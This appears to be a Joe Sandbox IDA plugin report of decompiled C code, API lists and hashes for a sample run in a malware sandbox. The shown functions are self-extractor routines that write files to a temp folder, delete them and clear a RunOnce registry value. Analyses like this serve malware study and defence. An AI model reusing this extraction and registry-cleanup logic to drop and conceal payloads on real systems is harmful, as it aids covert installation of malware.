                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 1e9bfdc998f96e6d0e5ce8a7c8779e3b878f37e47c0d21a1130c4cf1b83e2c1c
                                                                                                                                                                                                        • Instruction ID: 17fe7a0abf2e01b0de52576c8e2fcdf168b6644210483e68665f09b7e239d8cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e9bfdc998f96e6d0e5ce8a7c8779e3b878f37e47c0d21a1130c4cf1b83e2c1c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C811EFF1204609FBE3246BB1AC49B3B619EEFD93A0B554129B746E6590EF7D8C408234
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E001F52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0x1f91e0; // 0x27e8ea8
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0x1f8a24 == 0 &&  *0x1f9a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0x1f8a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0x1f8a24 == 0 &&  *0x1f9a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E001F1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        					if(( *0x1f9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E001F65E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E001F2390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0x1f8a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0x1f9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E001F1FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0x1f8a20 =  *0x1f8a20 & 0x00000000;
                                                                                                                                                                                                        				return E001F6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(027E8EA8,00000080,?,00000000), ref: 001F52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(027E8EA8), ref: 001F52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(027E8EA8,?,00000000), ref: 001F5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(027E8EA8), ref: 001F530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(001F11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 001F5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001F5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-1610346413
                                                                                                                                                                                                        • Opcode ID: 6488344eb903f0cd93bad8c90eba8ec26ff6023dce9e6dd3e71711b3f59048ef
                                                                                                                                                                                                        • Instruction ID: a9703890b4faf41e0429b5fa937ffdc67fd4da7b5c9060b86d774768500e958e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6488344eb903f0cd93bad8c90eba8ec26ff6023dce9e6dd3e71711b3f59048ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1421AE3190461CDBDB20AB28ED09B7977B5FB14794F440259FB86579A0CFB59CD4CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F1FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0x1f8530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,001F538C,?,?,001F538C), ref: 001F2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(001F538C,wextract_cleanup2,?,?,001F538C), ref: 001F2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(001F538C,?,?,001F538C), ref: 001F2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 849931509-3354236729
                                                                                                                                                                                                        • Opcode ID: a9f2dba674427973f58beeb8a5a5a3cb516346bbd9ab9f2fc192389c4aece37c
                                                                                                                                                                                                        • Instruction ID: a34f4a4a7d3edb8d0c42ecd260090ea173d507e07f7669b5783ea8ab90114c2c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9f2dba674427973f58beeb8a5a5a3cb516346bbd9ab9f2fc192389c4aece37c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5EE04F7155031CBBDB219B90FC0AF797B2AEB01740F500194FA08A04A0EF755A94D605
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0x1f91d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E001F4E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E001F6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0x1f91e4;
                                                                                                                                                                                                        						_t58 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0x1f91e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0x1f91e4;
                                                                                                                                                                                                        						_t30 = E001F4702( &_v268, 0x1f91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E001F476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E001F4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E001F47E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x1f93f4 =  *0x1f93f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0x1f91e4;
                                                                                                                                                                                                        						_t63 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0x1f91e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0x1f91e4;
                                                                                                                                                                                                        						_t30 = E001F4702( &_v268, 0x1f91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E001F4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E001F4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E001F4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f4d2d
                                                                                                                                                                                                        0x001f4cf8
                                                                                                                                                                                                        0x001f4cfd
                                                                                                                                                                                                        0x001f4d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 001F4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 001F4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-1610346413
                                                                                                                                                                                                        • Opcode ID: 2d62b9d16fd03785bd1d9dccc433a379221dc640380029b1070ddde49c4a7be2
                                                                                                                                                                                                        • Instruction ID: 5dc0f55afec41585ee42d6b022bbc38c90a40320c1e6cc3efa04d331103e313e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d62b9d16fd03785bd1d9dccc433a379221dc640380029b1070ddde49c4a7be2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D41773620410D8BCB25AFB8DD446F773A5FF65340F044668EA8A97686DF31EE8AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0x1f8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0x1f8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 001F4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001F4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 001F4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 3dca0326b4d6ab6da497b97f7b6b43cf4f50ab0448de2f1a2692188127066302
                                                                                                                                                                                                        • Instruction ID: a9560a72b6a8a87a707858438866b0352f90081d5f74d621fda06e0f762e1512
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3dca0326b4d6ab6da497b97f7b6b43cf4f50ab0448de2f1a2692188127066302
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96F0B4B260120CAFAB24DFB4CC48DBB77ACEF04350B44452BBA19C1050EB34E958C7A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E001F487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,001F4A23,?,001F4F67,*MEMCAB,00008000,00000180), ref: 001F48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,001F4F67,*MEMCAB,00008000,00000180), ref: 001F4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: cfda0653601998b4ab77a079b179b9a3ec3b1142da5c9806e652ca3194a8e442
                                                                                                                                                                                                        • Instruction ID: fddf93a6ca8a602fe57c5a46a7e7aa1c81a20ab4fb1da80c8ac2fb11e0d5483c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfda0653601998b4ab77a079b179b9a3ec3b1142da5c9806e652ca3194a8e442
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 520128A3E1557826F22440694C88BB7551C9B9A674F1B0234BEEAA61D1D6645C0481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0x1f858c; // 0x268
                                                                                                                                                                                                        				_t9 = E001F3680(_t20);
                                                                                                                                                                                                        				if( *0x1f91d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0x1f8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0x1f9400; // 0xa3800
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0x1f9400 = _t15;
                                                                                                                                                                                                        							if( *0x1f8184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0x1f8584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1f93f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
